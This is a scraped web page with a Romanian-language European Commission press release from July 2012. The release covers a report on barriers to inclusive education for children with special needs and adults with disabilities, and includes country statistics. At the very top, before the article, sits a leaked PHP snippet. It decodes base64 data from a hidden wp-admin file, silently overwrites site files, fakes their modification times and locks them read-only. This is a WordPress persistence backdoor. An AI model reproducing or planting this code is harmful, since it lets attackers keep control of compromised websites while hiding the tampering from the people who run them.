$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } InfoCons: Copiii cu nevoi speciale și adulții cu handicap se confruntă în continuare cu probleme în ceea ce privește educația, potrivit unui nou raport – O noua atitudine

În ciuda angajamentelor asumate de statele membre de a promova educația favorabilă incluziunii, copiii cu nevoi educaționale speciale și adulții cu handicap continuă să se confrunte cu probleme, conform unui raport publicat astăzi de Comisia Europeană.

Mulți sunt plasați în instituții segregate, iar cei din instituțiile educaționale normale primesc adesea un sprijin necorespunzător, afirmă raportul.Acesta invită statele membre să depună eforturi mai serioase pentru a dezvolta sisteme de educație favorabile incluziunii și pentru a înlătura obstacolele cu care se confruntă grupurile vulnerabile în ceea ce privește participarea și succesul în educație, formare și ocuparea forței de muncă.

„Trebuie să ne intensificăm eforturile de a oferi politici educaționale favorabile incluziunii finanțate adecvat, dacă dorim să îmbunătățim viețile copiilor cu nevoi educaționale speciale și ale adulților cu handicap.Este momentul să ne respectăm angajamentele asumate.Educația favorabilă incluziunii nu este o opțiune extra;este o necesitate de bază.Trebuie să îi așezăm pe cei mai vulnerabili în centrul acțiunilor noastre de a obține o viață mai bună pentru toți”, a declarat Androulla Vassiliou, comisar european pentru educație, cultură, multilingvism și tineret.

Aproximativ 45 de milioane de cetățeni ai UE de vârstă activă au un handicap și 15 milioane de copii au nevoi educaționale speciale.Raportul arată că, în unele cazuri, aceștia sunt privați complet de oportunități educaționale și de ocupare a unui loc de muncă.Copiii cu nevoi educaționale speciale părăsesc frecvent școala fără calificări sau slab calificați, înainte de trecerea la o formare specializată care poate, în unele cazuri, mai curând să afecteze perspectivele profesionale, decât să le extindă.Persoanele cu handicap sau cu nevoi educaționale speciale au mai multe șanse să fie șomeri sau inactivi din punct de vedere economic, și chiar cei care au un relativ succes pe piața locurilor de muncă adesea câștigă mai puțin decât omologii lor fără handicap, afirmă raportul.

În toate statele membre, copiii defavorizați (în special băieții) din minoritatea etnică romă și din medii defavorizate din punct de vedere socio-economic sunt suprareprezentați în școlile pentru copii cu nevoi speciale.Raportul pune problema dacă sistemele educaționale speciale nu sporesc cumva izolarea elevilor care sunt deja marginalizați din punct de vedere social, reducând mai degrabă decât îmbunătățindu-le șansele în viață.Cercetările sugerează că acești copii ar putea fi înscriși la școlile normale dacă s-ar investi mai mult în dezvoltarea competențelor lor lingvistice și dacă ar exista o mai mare sensibilitate la diferențele culturale.

De asemenea, raportul evidențiază diferențe mari între statele membre în ceea ce privește modul în care sunt identificați copiii cu nevoi speciale, precum și în ceea ce privește plasarea lor în școli normale sau speciale.De exemplu, în Flandra (Belgia) 5,2% dintre elevii cu nevoi speciale se află în școli speciale segregate, în timp ce în Italia procentul este doar de 0,01%.Raportul sugerează că mai sunt multe de făcut pentru armonizarea definițiilor și îmbunătățirea colectării datelor pentru a permite țărilor să își compare mai eficient abordările și să învețe reciproc din experiența acumulată.

Context

Raportul „Educație și handicap/nevoi speciale – politici și practici în materie de educație, formare și ocupare a forței de muncă pentru studenți cu handicap și nevoi educaționale speciale în UE”, a fost elaborat pentru Comisia Europeană de rețeaua independentă de experți în științe sociale ale educației și formării (NESSE).

Alte constatări importante ale raportului

·         Chiar dacă elevii cu deficiențe profunde pot fi dificil de inclus în medii normale de învățământ sau ar putea fi mai bine îngrijiți în medii separate, există din ce în ce mai multe dovezi că un număr foarte mare de studenți cu handicap/nevoi educaționale speciale pot fi integrați în sistemul normal de învățământ și că o educație de calitate favorabilă incluziunii este bună pentru toți cursanții;

·         Deși orientarea către sisteme educaționale mai favorabile incluziunii este de o importanță vitală, educația profesorilor și dezvoltarea profesională continuă nu au fost întotdeauna organizate pe principii favorabile incluziunii;

·         În plus față de profesori, profesorii de sprijin în învățare și asistenții la clasă joacă un rol vital în buna funcționare practică a incluziunii;

·         În unele țări europene, programele școlare sunt standardizate și inflexibile, ceea ce face ca incluziunea copiilor cu handicap să fie dificilă.Practicile de repetare a anului subminează și ele principiile de incluziune;

·         Persoanele cu handicap au mai puține șanse să progreseze în învățământul superior decât persoanele fără handicap;

·         Persoanele cu handicap care obțin calificări de învățământ superior se confruntă și ele cu dezavantaje pe piața muncii, dar au mult mai multe șanse de angajare decât persoanele cu handicap mai slab calificate;

·         Nu există date comparative paneuropene privind numărul studenților cu handicap în învățământul superior, sau privind tipurile de handicap și rezultatele celor care urmează învățământul superior;

·         Lipsesc datele fiabile și actualizate privind numărul de persoane cu handicap care ocupă un loc de muncă în diferite țări din UE;

·         Pensiile de invaliditate ameliorează riscul sărăciei și al excluziunii sociale, dar au toate șansele să fie reduse din cauza limitării actuale a cheltuielilor publice în întreaga Europă;

·         Aranjamentele de „flexisecuritate” sunt utile pentru a permite persoanelor cu handicap să lucreze cu normă parțială fără să își piardă beneficiile în întregime;

·         Există o convergență considerabilă a politicilor privind handicapul și ocuparea forței de muncă din întreaga Europă, majoritatea țărilor adoptând măsuri similare de asistență pentru ocuparea unui loc de muncă.Cu toate acestea, sprijinul pentru găsirea unui loc de muncă și programele de reabilitare profesională diferă în ceea ce privește eficacitatea în a introduce persoanele cu handicap pe piața forței de muncă sau în a le ajuta să își păstreze locul de muncă dacă devin handicapate în timp ce muncesc.

 

S-au pus deja în practică mai multe inițiative ale UE pentru consolidarea învățământului pentru persoane cu nevoi speciale:

·         Cadrul strategic al UE pentru cooperarea europeană în domeniul educației și formării profesionale („ET 2020”)încurajează statele membre să asigure integrarea cu succes a tuturor celor care învață, inclusiv a celor cu nevoi speciale.Concluziile Consiliului din mai 2010 privind dimensiunea socială a educației și a formării profesionale au întărit acest mesaj.

·         În ultimul trimestru din 2012, Comisia va publica un document de lucru privind echitatea în educație și formare profesională. Aceasta va include un capitol privind educația favorabilă incluziunii cu exemple de politici de succes și de cele mai bune practici.

·         Comisia Europeană sprijină financiar Agenția Europeană pentru Dezvoltarea Educației Speciale. Activitatea agenției îmbunătățește cunoștințele privind educația favorabilă incluziunii și promovează cooperarea transnațională și schimbul de cunoștințe în acest domeniu.

Pentru informații suplimentare

Raportul complet

Comisia Europeană: Educație și formare profesională

Site-ul internet al Androullei Vassiliou

Urmăriți-o pe Twitter pe Androulla Vassiliou @VassiliouEU

Numărul elevilor din învățământul obligatoriu și procentul de elevi în școlile segregate speciale și în clase speciale

 

Țara Număr de elevi din învățământul obligatoriu Număr de elevi cu nevoi educaționale speciale și procent din populația totală de elevi Număr de elevi în școli speciale segregate și procent din populația totală de elevi Număr de elevi în clase speciale segregate și procent din populația totală de elevi

 

Austria 802 519 28 525 (3,5%) 11 787 (1,5%) 965 (0,1%)
Belgia (Fl.) 871 920 54 336 (6,2%) 46 091 (5,2%) 0
Belgia (Val.) 687 137 30 993 (4,5%) 30 773 (4,4%) 0
Bulgaria 693 270 14 083 (2,0%) 8 119 (1,1%) 391 (0,05%)
Cipru 97 938 5 445 (5,5%) 293 (0,3%) 583 (0,6%)
Republica Cehă 836 372 71 879 (8,6%) 30 092 (3,6%) 7 026 (0,8%)
Danemarca 719 144 33 733 (4,6%) 12 757 (1,8%) 18 986 (2,6%)
Estonia 112 738 10 435 (9,2%) 3 782 (3,0%) 1 459 (1,3%)
Finlanda 559 379 45 493 (8,1%) 6 782 (1,2%) 14 574 (2,6%)
Franța 12 542 100 356 803 (2,8%) 75 504 (0,6%) 161 351 (1,3%)
Germania 8 236 221 479 741 (5,8%) 399 229 (4,8%) 0
Grecia 1 146 298 29 954 (2,6%) 7 483 (0,6%) 22 471 (2,0%)
Ungaria 1 275 365 70 747 (5,5%) 33 014 (2,6%) 0
Islanda 43 511 10 650 (24,0%) 143 (0,3%) 348 (0,8%)
Irlanda 649 166 33 908 (5,2%) 4 976 (0,8%) 2 380 (0,4%)
Italia 7 326 567 170 696 (2,3%) 693 (0,01%) 0
Letonia 185 032 9 057 (4,8%) 6 363 (3,4%) 1 175 (0,6%)
Lituania 440 504 51 881 (11,7%) 4 253 (1,0%) 855 (0,2%)
Luxemburg 64 337 1 374 (2,2%) 663 (1,0%) 0
Malta 48 594 2 645 (5,4%) 137 (0,3%) 13 (0,03%)
Țările de Jos 2 411 194 103 821 (4,3%) 64 425 (2,7%) 0
Norvegia 615 883 48 802 (8,0%) 1 929 (0,3%) 5 321 (0,9%)
Polonia 4 511 123 127 954 (2,8%) 59 880 (1,3%) 0
Portugalia 1 331 050 35 894 (2,7%) 2 660 (0,2%) 2 115 (0,2%)
Slovenia 162 902 10 504 (2,7%) 2 829 (1,7%) 400 (0,24%)
Spania 4 437 258 104 343 (2,35%) 17 400 (0,4%) 0
Suedia 906 189 13 777 (1,5%) 516 (0,06%) 13 261 (1,5%)
Elveția 777 394 41 645 (5,4%) 16 223 (2,1%) 25 422 (3,3%)
Regatul Unit (Anglia) 8 033 690 225 920* (2,8%) 96 130 (1,2%) 16 190 (0,2%)
Regatul Unit (Scoția) 647 923 45 357 (7,0%) 6 659 (1,0%) 1 481 (0,2%)
Regatul Unit (Țara Galilor) 377 503 12 895 (3,4%) 3 070 (0,8%) 2 843 (0,7%)

 

* Datele pentru Anglia includ numai elevii cu declarații de necesități (Statements of Need)

Sursa:Agenția Europeană pentru Dezvoltarea Educației Speciale, date naționale 2010

 

 

Sursa: Comisia Europeana – Comunicat de presa

Bruxelles, 10 iulie 2012

By o9admin